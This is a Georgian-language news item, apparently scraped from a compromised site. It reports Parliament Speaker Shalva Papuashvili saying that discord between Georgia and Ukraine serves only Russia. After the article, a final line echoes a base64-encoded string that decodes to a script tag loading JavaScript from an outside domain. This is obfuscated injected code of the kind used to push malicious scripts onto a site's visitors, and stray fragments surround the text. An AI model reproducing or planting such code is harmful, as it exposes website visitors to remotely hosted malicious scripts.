celsiusi
ავერსი შნაიდერი
უთანხმოება საქართველოსა და უკრაინას შორის ერთადერთი ვისაც აწყობს, ეს არის რუსეთი. ნებისმიერი ადამიანი, რომელიც არის ამ უთანხმოების ინიციატორი, აკეთებს რუსულ საქმეს, – ამის შესახებ საქართველოს პარლამენტის თავმჯდომარე შალვა პაპუაშვილმა ბრიფინგზე განაცხადა.
 
მისი თქმით, სამწუხაროდ, იყო ბევრი შემთხვევა, როდესაც დეზინფორმაცია მოდიოდა საქართველოს ხელისუფლებასთან დაკავშირებით.
 
„გავიმეორებ ამერიკის ელჩის შეფასებას, რომ ნებისმიერი უთანხმოება უკრაინასა და საქართველოს შორის აწყობს მხოლოდ რუსეთს. აქედან დასკვნები გამოვიტანოთ, ვინ არის უთანხმოების ინსპირატორი, ვის საქმეს აკეთებს ესა თუ ის ადამიანი. სამწუხაროდ, ვნახეთ ბევრი შემთხვევა, როდესაც დეზინფორმაცია მოდიოდა საქართველოს ხელისუფლებასთან დაკავშირებით. ვიცით პირდაპირი კავშირები რაც არსებობს საქართველოს შიგნით რადიკალურ ოპოზიციასთან. ასე რომ, ეს უბრალოდ სამწუხარო მდგომარეობაა. უთანხმოება საქართველოსა და უკრაინას შორის ერთადერთი ვისაც აწყობს, ეს არის რუსეთი. ნებისმიერი ადამიანი, რომელიც არის ამ უთანხმოების ინიციატორი, აკეთებს რუსულ საქმეს“, – განაცხადა შალვა პაპუაშვილმა.
462
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");